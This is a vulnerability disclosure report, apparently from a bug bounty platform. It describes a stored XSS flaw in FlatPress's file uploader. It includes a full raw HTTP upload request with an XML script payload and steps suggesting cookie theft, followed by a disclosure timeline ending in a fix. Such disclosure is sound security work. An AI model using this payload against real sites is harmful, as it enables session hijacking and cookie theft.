Stored XSS via XML File in flatpressblog/flatpress


Reported on

Dec 24th 2022


When user upload a file with .xml extension and direct access this file, the server response with Content-type: image/svg+xml lead to processing XML as HTML file


POST /flatpress-master/admin.php?p=uploader&action=default HTTP/1.1
Host: localhost
Content-Length: 639
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMXzGcbIqZ5KtoAKf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; PHPSESSID=69js8mspjvh35iaud5vsb2sdfq; security_level=0; fpsess_fp-a37b0eea=81ft5fe9s1evbo5kaovh623v8u

Content-Disposition: form-data; name="_wpnonce"

Content-Disposition: form-data; name="_wp_http_referer"

Content-Disposition: form-data; name="upload[]"; filename="xss.xml"
Content-Type: image/svg+xml

<something:script xmlns:something="">alert(document.domain)</something:script>
Content-Disposition: form-data; name="upload"


Steps to take

  1. Log in and then access /admin.php?p=uploader&action=default
  2. Perform XML file upload, using malicious javascript to steal user cookies.


This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the flatpressblog/flatpress team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
We have contacted a member of the flatpressblog/flatpress team and are waiting to hear back a year ago
flatpressblog/flatpress maintainer validated this vulnerability a year ago

Learned that Markdown may contain JS as well - thanks!

juylang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
flatpressblog/flatpress maintainer marked this as fixed in 1.3 with commit 3cc223 a year ago
The fix bounty has been dropped
Juy Lang
a year ago


Can you help me, designate the vulnerability as a CVE !!

This vulnerability has now been published a year ago
to join this conversation